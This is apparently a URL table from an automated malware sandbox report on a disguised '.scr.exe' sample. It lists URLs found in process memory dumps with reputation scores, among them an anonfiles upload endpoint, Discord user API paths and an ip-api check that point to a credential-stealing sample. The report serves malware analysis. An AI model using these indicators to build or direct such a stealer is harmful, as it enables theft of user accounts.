https://www.leboncoin.fr/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://tools.ietf.org/html/rfc2388#section-4.4	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327717608.0000028C87630000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C8737A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2060606390.0000028C87391000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2920px	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://weibo.com/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.anonfiles.com/upload	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.msn.com	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88278000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2332092681.0000028C88A42000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoftILEEX~1.LNKy./	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000007.00000002.2265902518.0000016191CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.0000015310075000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.000001530196F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discord.com/api/v9/users/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://cacerts.digi	#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040742387.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoftISPLA~1.PNGy.	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330228467.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://peps.python.org/pep-0205/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2053300423.0000028C876DF000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2057343585.0000028C876DA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2057514542.0000028C876DF000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2053108442.0000028C876DA000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.reddit.com/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000007.00000002.2195052867.0000016181C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2158201728.0000015300001000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.amazon.ca/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330698605.0000028C88140000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327145319.0000028C8724C000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ebay.co.uk/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000029.00000002.2158201728.0000015301914000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000007.00000002.2195052867.0000016181EA8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ebay.de/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000029.00000002.2158201728.0000015301914000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://go.micro	powershell.exe, 00000029.00000002.2158201728.0000015300C35000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C872E0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052434132.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052638977.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2051510820.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.amazon.com/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/python/cpython/issues/86361.	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C8737A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2060852882.0000028C877E6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2061237289.0000028C87680000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://httpbin.org/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.youtube.com/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://allegro.pl/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000029.00000002.2158201728.0000015301914000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C8768F000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C87690000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoftRUSTT~2JSOy./	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327337197.0000028C872E0000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052434132.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052638977.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2051510820.0000028C87308000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://MD8.mozilla.org/1/m	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88248000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.python.org/psf/license/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8D69000.00000040.00000001.01000000.00000005.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.bbc.co.uk/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hostingr	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87D18000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://bugzilla.mo	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88234000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2329477529.0000028C87C6D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tools.ietf.org/html/rfc6125#section-6.4.3	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330698605.0000028C88168000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000007.00000002.2195052867.0000016181EA8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2111304815.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123517500.0000028C87C2E000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2143671721.0000028C87C2A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87BFE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://google.com/mail	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877E5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163201271.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322889946.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154159134.0000028C877C5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2130602364.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323195620.0000028C877D3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877E1000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326282443.0000028C877E4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877D6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877D9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2082475372.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163456438.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.python.org/psf/license/)	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2337720885.00007FF8A8C63000.00000040.00000001.01000000.00000005.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2052092387.0000028C87308000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.iqiyi.com/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://foss.heptapod.net/pypy/pypy/-/issues/3539	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2321848291.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330228467.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://google.com/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154822441.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2321848291.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2115215405.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330228467.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2162960886.0000028C87DCA000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://tools.ietf.org/html/rfc7231#section-4.3.6)	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.python.org/download/releases/2.3/mro/.	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327145319.0000028C871D0000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000029.00000002.2187351911.00000153101B8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discordapp.com/api/v9/users/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328428391.0000028C87830000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324232079.0000028C87D30000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/urllib3/urllib3/issues/2920	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154463139.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87B75000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330540975.0000028C8800C000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://yahoo.com/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877E5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163201271.0000028C877C9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322889946.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154159134.0000028C877C5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2130602364.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323195620.0000028C877D3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2142394974.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877E1000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326282443.0000028C877E4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324867751.0000028C877D6000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328156314.0000028C877D9000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2082475372.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2163456438.0000028C877CE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2139193812.0000028C877D5000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.mozilla.oL	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2135317494.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2123650876.0000028C8873A000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2103806631.0000028C8873B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.bellmedia.c	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2332092681.0000028C88A42000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88298000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.sectigo	#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000002.2344600266.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2344137024.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.0	#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000002.2344600266.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2344137024.000001CCD86BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2327784022.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2325587092.0000028C876A3000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://login.microsoftonline.com	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C8828C000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2332092681.0000028C88A42000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://go.micros	powershell.exe, 00000007.00000002.2286012485.000001619A462000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cacerts.digicert.co	#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041104820.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2042909763.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2040242282.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	#U202f#U202f#U2005#U00a0.scr.exe, 00000000.00000003.2041680595.000001CCD86C4000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://html.spec.whatwg.org/multipage/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2104256267.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2122461107.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2329026765.0000028C87B86000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2322690660.0000028C87B63000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2154463139.0000028C87B74000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2083926352.0000028C87B75000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2324666281.0000028C87B77000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2326023533.0000028C87B85000.00000004.00000020.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2323296128.0000028C87B76000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ifeng.com/	#U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2330934466.0000028C88208000.00000004.00001000.00020000.00000000.sdmp, #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2149555073.0000028C887AD000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
